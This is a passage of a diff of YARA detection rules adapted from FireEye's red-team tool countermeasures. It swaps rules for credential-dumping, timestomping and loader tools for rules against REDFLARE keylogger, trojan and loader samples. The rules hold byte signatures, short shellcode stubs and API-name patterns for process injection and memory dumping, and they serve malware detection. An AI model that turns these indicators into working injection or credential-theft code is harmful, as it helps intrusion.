?? 00 } + $alloc_n_load = { 41 B9 40 00 00 00 41 B8 00 30 00 00 33 C9 [1-10] FF 50 [4-80] F3 A4 [30-120] 48 6B C9 28 [3-20] 48 6B C9 28 } + $const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and $dump and any of ($shellcode*) + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_TITOSPECIAL_1 : FILE +rule FIREEYE_RT_APT_Keylogger_Win32_REDFLARE_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "b12490ba-41f6-5469-bcbb-0d2e0055c193" - date = "2020-11-25" - date = "2020-11-25" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/APT_HackTool_MSIL_TITOSPECIAL_1.yar#L4-L20" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4bf96a7040a683bd34c618431e571e26" - logic_hash = "6def0c667d38c1bad9233628e509bdcaed322e75be4ff3823b0f788c391e090c" - score = 75 - quality = 75 - tags = "FILE" - rev = 5 - - strings: - $ind_dump = { 1F 10 16 28 [2] 00 0A 6F [2] 00 0A [50-200] 18 19 18 73 [2] 00 0A 13 [1-4] 06 07 11 ?? 6F [2] 00 0A 18 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 } - $ind_s1 = "NtReadVirtualMemory" fullword wide - $ind_s2 = "WriteProcessMemory" fullword - $shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 } - $shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 } - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of ($ind*) and any of ($shellcode*) -} -rule FIREEYE_RT_Credtheft_MSIL_Titospecial_1 : FILE -{ - meta: - description = "This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code." - author = "FireEye" - id = "932bb013-03de-5cf7-89e9-b3232151d303" - date = "2020-12-09" + id = "ad14db66-d640-5712-b2c8-a3d42d5a90f3" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_1.yar#L4-L27" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win32_REDFLARE_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4bf96a7040a683bd34c618431e571e26" - logic_hash = "4ac9a5ede4aea5d73545b459eb635f87ce08ba521afa48b76d2cfa94f1379226" + hash = "d7cfb9fbcf19ce881180f757aeec77dd" + logic_hash = "aebbaa050bee3775ffac4214ea4ab58284384e7eb41e66ee4838b9359e72821e" score = 75 quality = 75 tags = "FILE" - rev = 4 - - strings: - $str1 = "Minidump" ascii wide - $str2 = "dumpType" ascii wide - $str3 = "WriteProcessMemory" ascii wide - $str4 = "bInheritHandle" ascii wide - $str5 = "GetProcessById" ascii wide - $str6 = "SafeHandle" ascii wide - $str7 = "BeginInvoke" ascii wide - $str8 = "EndInvoke" ascii wide - $str9 = "ConsoleApplication1" ascii wide - $str10 = "getOSInfo" ascii wide - $str11 = "OpenProcess" ascii wide - $str12 = "LoadLibrary" ascii wide - $str13 = "GetProcAddress" ascii wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of ($str*) -} -rule FIREEYE_RT_Credtheft_MSIL_Titospecial_2 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the TitoSpecial project. There are 2 GUIDs in this rule as the x86 and x64 versions of this tool use a different ProjectGuid." - author = "FireEye" - id = "0262c720-e6b8-5bf2-a242-19a7f044973f" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_2.yar#L4-L16" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4bf96a7040a683bd34c618431e571e26" - logic_hash = "2f621f8de2a4679e6cbce7f41859eaa3095ca54090c8bfccd3b767590ac91f2c" - score = 75 - quality = 71 - tags = "FILE" - rev = 4 + rev = 2 strings: - $typelibguid1 = "C6D94B4C-B063-4DEB-A83A-397BA08515D3" ascii nocase wide - $typelibguid2 = "3b5320cf-74c1-494e-b2c8-a94a24380e60" ascii nocase wide + $create_window = { 6A 00 68 [4] 6A 00 6A 00 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 CF 00 68 [4] 68 [4] 6A 00 FF 15 } + $keys_check = { 6A 14 [0-5] FF [1-5] 6A 10 [0-5] FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A0 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A1 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 74 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ($typelibguid1 or $typelibguid2) + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_Hacktool_Win64_Andrewspecial_1 : FILE +rule FIREEYE_RT_APT_Loader_Raw32_REDFLARE_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "20ce4902-4eb3-5ecf-aa8c-0515965dde57" - date = "2020-11-25" - date = "2020-11-25" + id = "8f8ec27f-afac-5da5-b76f-b984e14e0066" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win64_AndrewSpecial_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw32_REDFLARE_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4456e52f6f8543c3ba76cb25ea3e9bd2" - logic_hash = "96f06c46dfec795fcfd08c188853d0a3f781003ae118833719a175eb59049c0d" + hash = "4022baddfda3858a57c9cbb0d49f6f86" + logic_hash = "05ed89bd82600b4d5ef01ece2e0a9bd84e968988fd2bda1bab4ec316a9a9906b" score = 75 quality = 75 tags = "FILE" - rev = 5 + rev = 1 strings: - $dump = { 33 D2 B9 FF FF 1F 00 FF 15 [10-90] 00 00 00 00 [2-6] 80 00 00 00 [2-6] 02 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4-120] 00 00 00 00 [2-6] 00 00 00 00 [2-6] 00 00 00 00 41 B9 02 00 00 00 [6-15] E8 [4-20] FF 15 } - $shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 } - $shellcode_x64_inline = { C6 44 24 ?? 4C C6 44 24 ?? 8B C6 44 24 ?? D1 C6 44 24 ?? B8 C6 44 24 ?? 3C C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 0F C6 44 24 ?? 05 C6 44 24 ?? C3 } + $load = { EB ?? 58 [0-4] 8B 10 8B 48 [1-3] 8B C8 83 C1 ?? 03 D1 83 E9 [1-3] 83 C1 [1-4] FF D? } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and $dump and any of ($shellcode*) + ( uint16(0)!=0x5A4D) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_2 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_8 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "d1a3477d-55c6-5c33-bd65-5b1e0d65f24b" + id = "b090df60-8f4e-51ca-944c-6f9ce2d9c913" date = "2020-12-02" date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_2.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_8.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "83ed748cd94576700268d35666bf3e01" - logic_hash = "4ed1553f12c607792d7d4e7026ecb36231cd417a06eba8b2925c2c643436b5fe" + hash = "9c8eb908b8c1cda46e844c24f65d9370, 9e85713d615bda23785faf660c1b872c" + logic_hash = "5b8a0402886daebefb995e7df0877d51727c5b8dc58eeb8ff16ceec5e7811a20" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $f0 = "mscoree.dll" fullword nocase - $s0 = { 06 72 [4] 6F [4] 2C ?? 06 72 [4] 6F [4] 2D ?? 72 [4] 28 [4] 28 [4] 2A } - $s1 = { 02 28 [4] 0A 02 28 [4] 0B 02 28 [4] 0C 72 [4] 28 [4] 72 } - $s2 = { 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 72 } - $s3 = "SetCreationTime" fullword - $s4 = "GetLastAccessTime" fullword - $s5 = "SetLastAccessTime" fullword + $1 = "PSRunner.PSRunner" fullword + $2 = "CorBindToRuntime" fullword + $3 = "ReportEventW" fullword + $4 = "InvokePS" fullword wide + $5 = "runCommand" fullword + $6 = "initialize" fullword + $trap = { 03 40 00 80 E8 [4] CC } condition: ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Hacktool_MSIL_Sharpstomp_1 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharpStomp project." - author = "FireEye" - id = "e113c221-fabe-5af4-b763-463c4f86288d" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/HackTool_MSIL_SharpStomp_1.yar#L4-L15" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "83ed748cd94576700268d35666bf3e01" - logic_hash = "fd0a3d046734d48be74d9a74f27570468550d21911c54ca82c81a1d64e9fdd17" - score = 75 - quality = 73 - tags = "FILE" - rev = 4 - - strings: - $typelibguid1 = "41f35e79-2034-496a-8c82-86443164ada2" ascii nocase wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 -} -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_3 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "4b4a54c8-9717-5fbb-8130-a49162bc6b07" - date = "2020-12-02" - date = "2020-12-02" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_1.yar#L4-L24" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "83ed748cd94576700268d35666bf3e01" - logic_hash = "af8aa0e87d8b6623a908fde5014f3849cd0ca20d5926c798be82ce4eab2668bb" - score = 75 - quality = 71 - tags = "FILE" - rev = 3 - - strings: - $s0 = "mscoree.dll" fullword nocase - $s1 = "timestompfile" fullword nocase - $s2 = "sharpstomp" fullword nocase - $s3 = "GetLastWriteTime" fullword - $s4 = "SetLastWriteTime" fullword - $s5 = "GetCreationTime" fullword - $s6 = "SetCreationTime" fullword - $s7 = "GetLastAccessTime" fullword - $s8 = "SetLastAccessTime" fullword - - condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them -} -rule FIREEYE_RT_Hacktool_MSIL_Keepersist_1 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeePersist' project." - author = "FireEye" - id = "950a4744-2696-5eb7-8524-7f689cb5dbb0" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEPERSIST/production/yara/HackTool_MSIL_KeePersist_1.yar#L4-L15" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "eae67c77a64ca07f9ef59a356bb2c3f3131f14e7f17c898ef8857a21090ace0e" - score = 75 - quality = 73 - tags = "FILE" - rev = 2 - - strings: - $typelibguid0 = "1df47db2-7bb8-47c2-9d85-5f8d3f04a884" ascii nocase wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them -} -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSACK_1 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsack' project." - author = "FireEye" - id = "8e344acb-73c4-5509-be9d-85cf6fe94445" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSACK/production/yara/APT_HackTool_MSIL_SHARPSACK_1.yar#L4-L15" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "ecc3250e65e34595b4b827add3eb3062edad6a3373930048bfd6225d4a229e93" - score = 75 - quality = 73 - tags = "FILE" - rev = 2 - - strings: - $typelibguid0 = "1946808a-1a01-40c5-947b-8b4c3377f742" ascii nocase wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them -} -rule FIREEYE_RT_Hacktool_MSIL_SAFETYKATZ_4 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SafetyKatz project." - author = "FireEye" - id = "e160b75d-cc39-5e16-86e1-cba9fe64a6b6" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SAFETYKATZ/production/yara/HackTool_MSIL_SAFETYKATZ_4.yar#L4-L15" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "45736deb14f3a68e88b038183c23e597" - logic_hash = "a02b4acea691d485f427ed26487f2f601065901324a8dcd6cd8de9502d8cd897" - score = 75 - quality = 73 - tags = "FILE" - rev = 3 - - strings: - $typelibguid1 = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii nocase wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 -} -rule FIREEYE_RT_Hacktool_MSIL_INVEIGHZERO_1 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'inveighzero' project." - author = "FireEye" - id = "f46fe365-ea50-5597-828e-61a7225e4c6e" - date = "2020-12-09" + id = "2f6785c4-f4d0-52ff-8c46-da953e2ca92a" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/INVEIGHZERO/production/yara/HackTool_MSIL_INVEIGHZERO_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_3.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "5d10557a83dae9508469fe87f4c0c91beec4d2812856eee461a82d5dbb89aa35" + hash = "9ccda4d7511009d5572ef2f8597fba4e,ece07daca53dd0a7c23dacabf50f56f1" + logic_hash = "ee104bc145686a134e4d6d620dae7d1dacff7645d47f1a8d7a212327352b8e87" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "113ae281-d1e5-42e7-9cc2-12d30757baf1" ascii nocase wide + $calc_image_size = { 28 00 00 00 [2-30] 83 E2 1F [4-20] C1 F8 05 [0-8] 0F AF C? [0-30] C1 E0 02 } + $str1 = "CreateCompatibleBitmap" fullword + $str2 = "BitBlt" fullword + $str3 = "runCommand" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_2 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_2 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "3befb3f2-81d1-5db2-84d9-773158b9837c" - date = "2020-12-03" - date = "2020-12-03" + id = "84881e5c-05df-5911-af42-ec82e559588c" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_2.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_2.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e91670423930cbbd3dbf5eac1f1a7cb6" - logic_hash = "0467532d643cf0200c6561b0724c884230892bf59db163c311b7d4f8acbb63d6" + hash = "9529c4c9773392893a8a0ab8ce8f8ce1,05b99d438dac63a5a993cea37c036673" + logic_hash = "1f2e1f644b1932486444dfda30b7dad7f50121f59fa493eb8a1a0528ae46db26" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 2 strings: - $ss1 = "\x00NtMapViewOfSection\x00" - $ss2 = "\x00NtOpenProcess\x00" - $ss3 = "\x00NtAlertResumeThread\x00" - $ss4 = "\x00LdrGetProcedureAddress\x00" - $ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00" - $ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00" - $tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00" + $1 = "initialize" fullword + $2 = "getData" fullword + $3 = "putData" fullword + $4 = "fini" fullword + $5 = "Cookie: SID1=%s" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_1 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "1b5f1f39-9fa2-5940-8da3-03808e4b7a5d" - date = "2020-12-03" - date = "2020-12-03" + id = "c3054680-9c87-5d90-b78e-b260904340df" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_1.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_1.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e91670423930cbbd3dbf5eac1f1a7cb6" - logic_hash = "f2244c6761639c1162a77a5e82296903c3cc21fbf46d262c779c5e4d6a2ef937" + hash = "100d73b35f23b2fe84bf7cd37140bf4d,4e7e90c7147ee8aa01275894734f4492" + logic_hash = "08ea2151418f7f75a8b138146c393a5ea85647320cc8e9fe1930d75871ab94bb" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 } - $sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 } - $ss1 = "\x00NtMapViewOfSection\x00" - $ss2 = "\x00NtOpenProcess\x00" - $ss3 = "\x00NtAlertResumeThread\x00" - $ss4 = "\x00LdrGetProcedureAddress\x00" - $tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00" + $1 = "initialize" fullword + $2 = "runCommand" fullword + $3 = "stop" fullword + $4 = "fini" fullword + $5 = "VirtualAllocEx" fullword + $6 = "WriteProcessMemory" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and (@sb1[1]<@sb2[1]) and ( all of ($ss*)) and ( all of ($tb*)) + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Loader_MSIL_Trimbishop_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_2 : FILE { meta: - description = "This rule looks for .NET PE files that have the string 'msg' more than 60 times as well as numerous function names unique to or used by the TrimBishop tool. All strings found in RuralBishop are reversed in TrimBishop and stored in a variable with the format 'msg##'. With the exception of 'msg', 'DTrim', and 'ReverseString' the other strings referenced in this rule may be shared with RuralBishop." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "4d58f0a2-bf16-584c-8e92-c8ef54427767" - date = "2020-12-09" + id = "043f4e29-710d-5e17-a0ed-82cd3a565194" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_TrimBishop_1.yar#L4-L26" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_2.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "09bdbad8358b04994e2c04bb26a160ef" - logic_hash = "018e87542301db22c384fda2709e8d49711c0fa041d1ef591f98ee7a70dbb677" + hash = "100d73b35f23b2fe84bf7cd37140bf4d" + logic_hash = "9fad845ed963fae46ac7ddc44407d5f6ed0a061f6a106764b9f912ef718279b4" score = 75 - quality = 50 + quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $msg = "msg" ascii wide - $msil = "_CorExeMain" ascii wide - $str1 = "RuralBishop" ascii wide - $str2 = "KnightKingside" ascii wide - $str3 = "ReadShellcode" ascii wide - $str4 = "ReverseString" ascii wide - $str5 = "DTrim" ascii wide - $str6 = "QueensGambit" ascii wide - $str7 = "Messages" ascii wide - $str8 = "NtQueueApcThread" ascii wide - $str9 = "NtAlertResumeThread" ascii wide - $str10 = "NtQueryInformationThread" ascii wide + $alloc = { 45 8B C0 33 D2 [2-6] 00 10 00 00 [2-6] 04 00 00 00 [1-6] FF 15 [4-60] FF 15 [4] 85 C0 [4-40] 20 00 00 00 [4-40] FF 15 [4] 85 C0 } + $inject = { 83 F8 01 [2-20] 33 C0 45 33 C9 [3-10] 45 33 C0 [3-10] 33 D2 [30-100] FF 15 [4] 85 C0 [20-100] 01 00 10 00 [0-10] FF 15 [4] 85 C0 [4-30] FF 15 [4] 85 C0 [2-20] FF 15 [4] 83 F8 FF } + $s1 = "ResumeThread" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $msil and #msg>60 and all of ($str*) + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_1 : FILE +rule FIREEYE_RT_APT_Downloader_Win32_REDFLARE_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "1a3f4247-25f4-51ca-b881-209c0753b915" - date = "2020-12-03" - date = "2020-12-03" + id = "e8d7ee31-568e-58ac-98ad-49baa2eb37ea" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_1.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win32_REDFLARE_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e91670423930cbbd3dbf5eac1f1a7cb6" - logic_hash = "f020efff58c8b7761d700c662c422a9e1ffdf8fe5f6648e421b7c257e3b8d078" + hash = "05b99d438dac63a5a993cea37c036673" + logic_hash = "a340a2a732a9b1aa74ca9d84009a88d1b14b6a03140a859384c0d6e745e4a90a" score = 75 quality = 75 